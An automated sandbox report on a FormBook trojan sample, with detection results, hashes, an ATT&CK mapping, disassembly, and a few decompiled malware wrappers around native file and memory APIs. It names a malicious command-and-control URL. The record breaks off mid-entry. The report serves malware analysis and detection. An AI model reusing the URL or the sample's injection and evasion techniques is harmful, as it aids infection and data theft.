          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8410 mov eax, dword ptr fs:[00000030h]3_2_009E8410
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A02430 mov eax, dword ptr fs:[00000030h]3_2_00A02430
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A02430 mov eax, dword ptr fs:[00000030h]3_2_00A02430
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB740D mov eax, dword ptr fs:[00000030h]3_2_00AB740D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB740D mov eax, dword ptr fs:[00000030h]3_2_00AB740D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB740D mov eax, dword ptr fs:[00000030h]3_2_00AB740D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E4439 mov eax, dword ptr fs:[00000030h]3_2_009E4439
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FB433 mov eax, dword ptr fs:[00000030h]3_2_009FB433
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FB433 mov eax, dword ptr fs:[00000030h]3_2_009FB433
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FB433 mov eax, dword ptr fs:[00000030h]3_2_009FB433
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0746D mov eax, dword ptr fs:[00000030h]3_2_00A0746D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E9450 mov eax, dword ptr fs:[00000030h]3_2_009E9450
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B477 mov eax, dword ptr fs:[00000030h]3_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1A44B mov eax, dword ptr fs:[00000030h]3_2_00A1A44B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A7C450 mov eax, dword ptr fs:[00000030h]3_2_00A7C450
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A7C450 mov eax, dword ptr fs:[00000030h]3_2_00A7C450
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8466 mov eax, dword ptr fs:[00000030h]3_2_009E8466
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8466 mov eax, dword ptr fs:[00000030h]3_2_009E8466
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB8450 mov eax, dword ptr fs:[00000030h]3_2_00AB8450
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A135A1 mov eax, dword ptr fs:[00000030h]3_2_00A135A1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A165A0 mov eax, dword ptr fs:[00000030h]3_2_00A165A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A165A0 mov eax, dword ptr fs:[00000030h]3_2_00A165A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A165A0 mov eax, dword ptr fs:[00000030h]3_2_00A165A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB05AC mov eax, dword ptr fs:[00000030h]3_2_00AB05AC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB05AC mov eax, dword ptr fs:[00000030h]3_2_00AB05AC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E3591 mov eax, dword ptr fs:[00000030h]3_2_009E3591
          Source: all processes. Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

          HIPS / PFW / Operating System Protection Evasion:

          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Section loaded: unknown, target: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, protection: execute and read and write
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe, Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe'

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match, File source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match, File source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Windows Management Instrumentation | Path Interception | Process Injection 111 | Virtualization/Sandbox Evasion 1 | Input Capture 1 | Security Software Discovery 12 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Software Packing 11 | LSASS Memory | Virtualization/Sandbox Evasion 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 111 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | System Information Discovery 12 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap |  | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information 3 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          SecuriteInfo.com.Variant.Zusy.394472.15672.exe | 51% | Virustotal |
          SecuriteInfo.com.Variant.Zusy.394472.15672.exe | 23% | Metadefender |
          SecuriteInfo.com.Variant.Zusy.394472.15672.exe | 61% | ReversingLabs | Win32.Trojan.VirRansom
          SecuriteInfo.com.Variant.Zusy.394472.15672.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.5c0000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
          3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          www.yjhlgg.com/grve/ | 9% | Virustotal |
          www.yjhlgg.com/grve/ | 100% | Avira URL Cloud | malware

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          www.yjhlgg.com/grve/ | true | 9%, Virustotal; Avira URL Cloud: malware | low

          Contacted IPs

          No contacted IP infos

          General Information

          Joe Sandbox Version:33.0.0 White Diamond
          Analysis ID:452434
          Start date:22.07.2021
          Start time:10:48:07
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 4m 4s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:SecuriteInfo.com.Variant.Zusy.394472.15672.20727 (renamed file extension from 20727 to exe)
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:6
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@3/0@0/0
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 37.8% (good quality ratio 34.8%)
          • Quality average: 67.9%
          • Quality standard deviation: 32%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 14
          • Number of non-executed functions: 276
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Stop behavior analysis, all processes terminated
          Warnings:
          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASN

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          No created / dropped files found

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):7.972672862174758
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:SecuriteInfo.com.Variant.Zusy.394472.15672.exe
          File size:198124
          MD5:89cfb542cda6a428cc5c02feaf3c55f8
          SHA1:9a0606c633ffe5ae4b6dcb7dcfba57b7e22cb05d
          SHA256:b663fea76aadbf574e5bb9f704ad689ec10f0d720b0b9641e70b27494fe4cc17
          SHA512:22fd691c761ec2ac5be4b3a9b682daf53abb3de05787d07474bc0e41a8c7bf001a10783f3eea6d7d70528dae1da13506e4370b16f3c02b7d92db9e6ffb2ac79b
          SSDEEP:3072:p5y2zSw5QFZ5h8gOgXN15tm4Inoll4wegWYXzb+f3iIvwDrqvHDlkNBKrD9CafOn:Dy2OVbFvLKzTwePi+nQrU8+fLBcMQ
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........WuIl9&Il9&Il9&@..&Bl9&Il8&Ul9&@..&Hl9&@..&Hl9&RichIl9&........PE..L......`.....................................0....@........

          File Icon

          Icon Hash:00828e8e8686b000

          Static PE Info

          General

          Entrypoint:0x401000
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
          Time Stamp:0x60F8A6D1 [Wed Jul 21 22:59:29 2021 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:0
          File Version Major:5
          File Version Minor:0
          Subsystem Version Major:5
          Subsystem Version Minor:0
          Import Hash:ad7593902351b94d30c5d42690419916

          Entrypoint Preview

          Instruction
          push ebp
          mov ebp, esp
          sub esp, 000002B0h
          mov byte ptr [ebp-000002A8h], FFFFFFE9h
          mov byte ptr [ebp-000002A7h], FFFFFF90h
          mov byte ptr [ebp-000002A6h], 00000000h
          mov byte ptr [ebp-000002A5h], 00000000h
          mov byte ptr [ebp-000002A4h], 00000000h
          mov byte ptr [ebp-000002A3h], 00000055h
          mov byte ptr [ebp-000002A2h], FFFFFF8Bh
          mov byte ptr [ebp-000002A1h], FFFFFFECh
          mov byte ptr [ebp-000002A0h], 00000056h
          mov byte ptr [ebp-0000029Fh], FFFFFF8Bh
          mov byte ptr [ebp-0000029Eh], 00000075h
          mov byte ptr [ebp-0000029Dh], 00000008h
          mov byte ptr [ebp-0000029Ch], FFFFFFBAh
          mov byte ptr [ebp-0000029Bh], FFFFFF97h
          mov byte ptr [ebp-0000029Ah], 00000008h
          mov byte ptr [ebp-00000299h], 00000000h
          mov byte ptr [ebp-00000298h], 00000000h
          mov byte ptr [ebp-00000297h], 00000057h
          mov byte ptr [ebp-00000296h], FFFFFFEBh
          mov byte ptr [ebp-00000295h], 0000000Eh
          mov byte ptr [ebp-00000294h], FFFFFF8Bh
          mov byte ptr [ebp-00000293h], FFFFFFCAh
          mov byte ptr [ebp-00000292h], FFFFFFD1h
          mov byte ptr [ebp-00000291h], FFFFFFE8h
          mov byte ptr [ebp-00000290h], FFFFFFC1h
          mov byte ptr [ebp-0000028Fh], FFFFFFE1h
          mov byte ptr [ebp-0000028Eh], 00000007h
          mov byte ptr [ebp+00000000h], 00000000h

          Rich Headers

          Programming Language:
          • [ C ] VS2008 SP1 build 30729
          • [IMP] VS2008 SP1 build 30729
          • [LNK] VS2008 SP1 build 30729

          Data Directories

          Name | Virtual Address | Virtual Size | Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3084 | 0x78 | .rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_IAT | 0x3000 | 0x84 | .rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

          Sections

          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
          .text | 0x1000 | 0x1248 | 0x1400 | False | 0.470703125 | data | 4.74743195609 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          .rdata | 0x3000 | 0x3ae | 0x400 | False | 0.53515625 | data | 4.4688660684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

          Imports

          DLL | Import
          GDI32.dll | CreateCompatibleDC, SelectObject, SetBoundsRect, GetTextMetricsW, GdiArtificialDecrementDriver, AddFontResourceExA, GetWorldTransform
          SHLWAPI.dll | PathCombineW, SHRegOpenUSKeyW, PathIsSystemFolderA, StrNCatW, StrCmpW, PathFindExtensionW, UrlUnescapeA, UrlEscapeW
          WINSPOOL.DRV | DeviceCapabilitiesA, GetPrinterDataExW, ConfigurePortA, ConnectToPrinterDlg, DevQueryPrint, DeletePrinterDriverA
          MSVFW32.dll | DrawDibBegin, ICClose, MCIWndCreate
          AVIFIL32.dll | AVIStreamOpenFromFileA, AVIMakeStreamFromClipboard

          Network Behavior

          No network behavior found

          Code Manipulations


          System Behavior

          General

          Start time:10:48:51
          Start date:22/07/2021
          Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe'
          Imagebase:0x400000
          File size:198124 bytes
          MD5 hash:89CFB542CDA6A428CC5C02FEAF3C55F8
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:low

          General

          Start time:10:48:51
          Start date:22/07/2021
          Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe'
          Imagebase:0x400000
          File size:198124 bytes
          MD5 hash:89CFB542CDA6A428CC5C02FEAF3C55F8
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:low

          Disassembly

          Code Analysis


            Executed Functions

            APIs
            • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FileRead
            • String ID: 2MA$2MA
            • API String ID: 2738559852-947276439
            • Opcode ID: 9231cb5614d8c557bb3e64fc19a9f4c03e9d43485bdcffe22a1bdc3510d441bf
            • Instruction ID: b52bbb6598611d2992268cc9d77447b29299721f77dafbc4b8d1f8dd55c89911
            • Opcode Fuzzy Hash: 9231cb5614d8c557bb3e64fc19a9f4c03e9d43485bdcffe22a1bdc3510d441bf
            • Instruction Fuzzy Hash: 88F0F9B2200108AFCB14DFA9CC91DEB7BA9EF8C354F158649FA5DD7241D630E852CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 37%
            			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
            				void* _t18;
            				void* _t27;
            				intOrPtr* _t28;
            
            				_t13 = _a4;
            				_t28 = _a4 + 0xc48;
            				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
            				_t6 =  &_a32; // 0x414d32
            				_t12 =  &_a8; // 0x414d32
            				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
            				return _t18;
            			}







            APIs
            • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FileRead
            • String ID: 2MA$2MA
            • API String ID: 2738559852-947276439
            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
            • Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
            • Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00419D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
            				long _t21;
            				void* _t31;
            
            				_t3 = _a4 + 0xc40; // 0xc40
            				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
            				_t11 =  &_a20; // 0x414b77
            				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
            				return _t21;
            			}






            APIs
            • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CreateFile
            • String ID: wKA
            • API String ID: 823142352-3165208591
            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
            • Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
            • Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 64%
            			E00419F2A(void* __eax, void* __ecx, intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
            				long _t17;
            				void* _t26;
            
            				asm("out 0xb2, eax");
            				asm("lock jo 0x58");
            				_t13 = _a8;
            				_t4 = _t13 + 0xc60; // 0xca0
            				E0041A950(_t26, _a8, _t4,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x30);
            				_t17 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
            				return _t17;
            			}






            APIs
            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: AllocateMemoryVirtual
            • String ID:
            • API String ID: 2167126740-0
            • Opcode ID: 395c09626ae50f7f817281afd2d385ae11457b688b2065b5606197a2056e8641
            • Instruction ID: d0f2b1e1264ccab4336da6658470f8edd5e28067a6e14bb36b5f16e52d5c4024
            • Opcode Fuzzy Hash: 395c09626ae50f7f817281afd2d385ae11457b688b2065b5606197a2056e8641
            • Instruction Fuzzy Hash: 360116B2200209AFCB08DF99DC91DEB77ADEF88354F11851AFE1997241D634E861CBE5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00419F30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
            				long _t14;
            				void* _t21;
            
            				_t3 = _a4 + 0xc60; // 0xca0
            				E0041A950(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
            				return _t14;
            			}






            APIs
            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
            Memory Dump Source
            • Source File: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: AllocateMemoryVirtual
            • String ID:
            • API String ID: 2167126740-0
            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
